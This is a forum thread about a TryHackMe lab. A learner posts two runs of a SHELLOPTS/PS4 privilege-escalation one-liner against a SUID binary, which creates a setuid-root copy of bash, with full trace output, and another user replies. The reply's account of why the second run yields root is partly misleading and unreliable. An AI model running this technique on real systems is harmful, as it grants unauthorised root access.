Stuck in a understand the command to simulate privesc

Im was stuck in a command, im trying do task 14 method 2 in here https://tryhackme.com/room/linuxprivescarena but i fail to understand.

TCM@debian:/tmp$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chmod +s /tmp/bash )' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

/usr/local/bin/suid-env2

/usr/sbin/service apache2 start

basename /usr/sbin/service

VERSION='service ver. 0.91-ubuntu1'

basename /usr/sbin/service

USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'

SERVICE=

ACTION=

SERVICEDIR=/etc/init.d

OPTIONS=

'[' 2 -eq 0 ']'

cd /

'[' 2 -gt 0 ']'

case "${1}" in

'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'

'[' 2 -eq 2 -a start = --full-restart ']'

'[' -z '' ']'

SERVICE=apache2

shift

'[' 1 -gt 0 ']'

case "${1}" in

'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'

'[' 1 -eq 2 -a '' = --full-restart ']'

'[' -z apache2 ']'

'[' -z '' ']'

ACTION=start

shift

'[' 0 -gt 0 ']'

'[' -r /etc/init/apache2.conf ']'

'[' -x /etc/init.d/apache2 ']'

exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start

Starting web server: apache2httpd (pid 1723) already running

.

set +x

TCM@debian:/tmp$ id

uid=1000(TCM) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)"



and



"TCM@debian:/tmp$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

chown: changing ownership of `/tmp/bash': Operation not permitted

/usr/local/bin/suid-env2

/usr/sbin/service apache2 start

basename /usr/sbin/service

VERSION='service ver. 0.91-ubuntu1'

basename /usr/sbin/service

USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'

SERVICE=

ACTION=

SERVICEDIR=/etc/init.d

OPTIONS=

'[' 2 -eq 0 ']'

cd /

'[' 2 -gt 0 ']'

case "${1}" in

'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'

'[' 2 -eq 2 -a start = --full-restart ']'

'[' -z '' ']'

SERVICE=apache2

shift

'[' 1 -gt 0 ']'

case "${1}" in

'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'

'[' 1 -eq 2 -a '' = --full-restart ']'

'[' -z apache2 ']'

'[' -z '' ']'

ACTION=start

shift

'[' 0 -gt 0 ']'

'[' -r /etc/init/apache2.conf ']'

'[' -x /etc/init.d/apache2 ']'

exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start

Starting web server: apache2httpd (pid 1723) already running

.

cp: cannot create regular file `/tmp/bash': Permission denied

set +x

bash-4.1# id

uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)"

Why in command 1 i cant gain root, but 2 can do? diffirent between it just is “chown root.root /tmp/bash” and even it cant execute in here “chown: changing ownership of `/tmp/bash’: Operation not permitted”

Anyone can explain me the answer?

What do you mean? Why did you expect you will have root access after executing the first command?

You need root access to execute 2nd command (chown part). If you don’t, you will receive “Operation not permitted” (you already encountered it).

Because original command to practice is command 2 (command will get root privilege, as this tryhackme room teach), and 1 just is part i adjust, i dont know what problem cause the command 1 fault, im try add part “chown part” and remove it between two command to observe behavior of it, im see part have “chown part” give me a root privilege, even though “chown part” still die because i dont have enough privilege, and until now, im still dont know scheme of it why this diffirents (have chown part and not) can escalate privilege

I don’t think you understand it correctly. chown doesn’t grant you a root privilege, it changes the ownership of a file/folder to root (means root user owns that file/folder).

Actually you misunderstood the purpose of the command. The command #2 is not designed to grant you root access. It helps you to setup a copy of /bin/bash file which can run with escalated privilege (in this case, it is root user). In the other words, you can trigger the bash command using /tmp/bash like you are “root”.

To run the command #2, it is required root privilege to grant the ownership of /tmp/bash to root. Combine it with the “chmod +s” (granted setuid permission, so you can run that /tmp/bash with effective user ID of file owner, in this case, root) it helps you archive what I said earlier. Without the “chown root.root” (command #1), your command lost its purpose (you do the setup to run the /tmp/bash using your own user ID, you can do that anyway), and without root privilege, you cannot change the ownership to root (command #2).

Hope it helps!

ohh!!!, i dont realize until now, about purpose of those command, the commands just is set up, the crucial part is another place, thanks you so much for explain me!